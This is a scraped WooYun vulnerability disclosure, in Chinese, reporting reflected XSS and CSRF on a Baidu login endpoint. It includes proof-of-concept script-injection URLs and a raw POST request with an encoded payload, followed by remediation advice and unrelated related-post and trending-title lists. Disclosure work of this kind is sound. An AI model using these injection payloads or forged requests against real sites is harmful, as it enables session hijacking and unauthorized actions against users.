漏洞详情

披露状态:

2010-07-25: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-08-25: 细节向公众公开

简要描述:

百度某系统登陆页面存在跨站及CSRF漏洞。

详细说明:

http://data.baidu.com:80/report/accounts/checkLogin?password=xx&username=xx
该页面username和password两个函数均存在跨站弱点,该页面登录提交方式为post,但是该处存在CSRF漏洞,以该跨站为例,也可进行post跨站。

漏洞证明:

http://data.baidu.com:80/report/accounts/checkLogin?password="/><script>alert(/liscker/);</script>&username=xx
http://data.baidu.com:80/report/accounts/checkLogin?password=xx&username=="/><script>alert(/liscker/);</script>
POST /report/accounts/checkLogin HTTP/1.1
Host: data.baidu.com
Accept: */*
Referer: /report/accounts/checkLogin?form_refer=/huazhuangpin3/&username=test&password=123456
Accept-Language: en-us,en;q=0.7,zh-cn;q=0.3
Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Connection: Keep-Alive
Cookie: bsn=e32f13n887utmoopv5qdsrcb00
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
password=123456&form_refer=%2Fhuazhuangpin3%2F&username=%3Cscript%3Ealert%28%2Fliscker%2F%29%3C%2Fscript%3E

修复方案:

过滤跨站关键字
时间戳变量
验证码

版权声明:转载请注明来源 Liscker@乌云

百度某系统登陆页面跨站及CSRF漏洞相关推荐

  1. php 存储型跨站,php云人才系统存储型跨站两处

    漏洞作者: 龟兔赛跑 WooYun-2014-73319( WooYun: php云人才系统存储型跨站多处 )曾经报道过这两处存储型跨站,虽然厂商修了,但是还是可以以奇葩的方式XSS跨站. 0x01: ...

  2. php 存储型跨站,php云人才系统存储型跨站两处 | CN-SEC 中文网

    摘要 WooYun-2014-73319( WooYun: php云人才系统存储型跨站多处 )曾经报道过这两处存储型跨站,虽然厂商修了,但是还是可以以奇葩的方式XSS跨站. 漏洞作者: 龟兔赛跑 Wo ...

  3. 【安全牛学习笔记】CSRF跨站请求伪造***漏洞的原理及解决办法

    CSRF跨站请求伪造***漏洞的原理及解决办法 CSRF,夸张请求伪造漏洞 漏洞的原理及修复方法 1.常见的触发场景 2.漏洞原理:浏览器同源策略 3.DEMO 4.漏洞危害 5.如何避免&修 ...

  4. Weblogic服务端请求伪造漏洞(SSRF)和反射型跨站请求伪造漏洞(CSS)修复教程...

    一.服务端请求伪造漏洞 服务端请求伪造(Server-Side Request Forgery),是指Web服务提供从用户指定的URL读取数据并展示功能又未对用户输入的URL进行过滤,导致攻击者可借助 ...

  5. 漏洞解决方案-跨站请求伪造漏洞

    跨站请求伪造漏洞CSRF 跨站请求伪造漏洞CSRF 一.问题描述: 二.整改建议: 三.案例: 1. 客户端进行CSRF防御 2. 服务端进行CSRF防御 跨站请求伪造漏洞CSRF 一.问题描述: C ...

  6. WordPress qTranslate插件跨站请求伪造漏洞

    漏洞名称: WordPress qTranslate插件跨站请求伪造漏洞 CNNVD编号: CNNVD-201306-058 发布时间: 2013-06-07 更新时间: 2013-06-07 危害等 ...

  7. WordPress Event Easy Calendar插件多个跨站请求伪造漏洞

    漏洞名称: WordPress Event Easy Calendar插件多个跨站请求伪造漏洞 CNNVD编号: CNNVD-201309-083 发布时间: 2013-09-11 更新时间: 201 ...

  8. WordPress Citizen Space插件跨站请求伪造漏洞

    漏洞名称: WordPress Citizen Space插件跨站请求伪造漏洞 CNNVD编号: CNNVD-201307-463 发布时间: 2013-07-23 更新时间: 2013-07-23 ...

  9. WordPress WP cleanfix插件‘eval()’函数跨站请求伪造漏洞

    漏洞名称: WordPress WP cleanfix插件'eval()'函数跨站请求伪造漏洞 CNNVD编号: CNNVD-201305-381 发布时间: 2013-05-20 更新时间: 201 ...

最新文章

  1. apache kafka技术分享系列(目录索引)--转载
  2. opencv运动目标跟踪预测_基于Opencv的运动目标的检测和跟踪.pdf
  3. Django(四)数据库
  4. 微软正准备一个简易的Rootkit清除方案 助用户打补丁
  5. web中ajax实现二级联动,Ajax实现城市二级联动(一)
  6. 【SecureCRT的下载、安装与使用】详细过程
  7. 最强战队 | 三维视觉、SLAM方向全球顶尖实验室汇总
  8. 学习java的第五天 基本数据类型 double、char、boolean
  9. 《Android开源库》 Google 最新Hover Menu(悬浮菜单)
  10. 【BZOJ2827】千山鸟飞绝 离散化+splay
  11. Jquery WeUI(一)
  12. 微信网页怎么用电脑打开
  13. ubuntu命令行界面自作iso镜像
  14. Jquary全屏滚动插件fullpage.js的使用
  15. 模糊控制(fuzzy control)
  16. [数学]——充分和必要
  17. MATLAB---回归分析
  18. 记一次凉凉的小米前端面试
  19. 命令行查看BIOS信息与版本
  20. centos搭建USDT omni钱包节点

热门文章

  1. python的注释符_python 注释符
  2. c语言出圈问题数学算法,出圈问题
  3. 卡方检验怎么检验模型拟合优度
  4. 机顶盒(线刷/固件升级)通用教程
  5. 最接近神的人_NOI导刊2010提高(02)【洛谷P1774】
  6. telnet命令的详细讲解与使用
  7. shell 概述 shell 入门基础必知
  8. 魔兽世界最新模拟器支持9C1。52客户端
  9. 2021年中国高校计算机大赛团体程序设计天梯赛
  10. linux启动分区修复工具,Linux下的分区修复软件Testdisk(转载)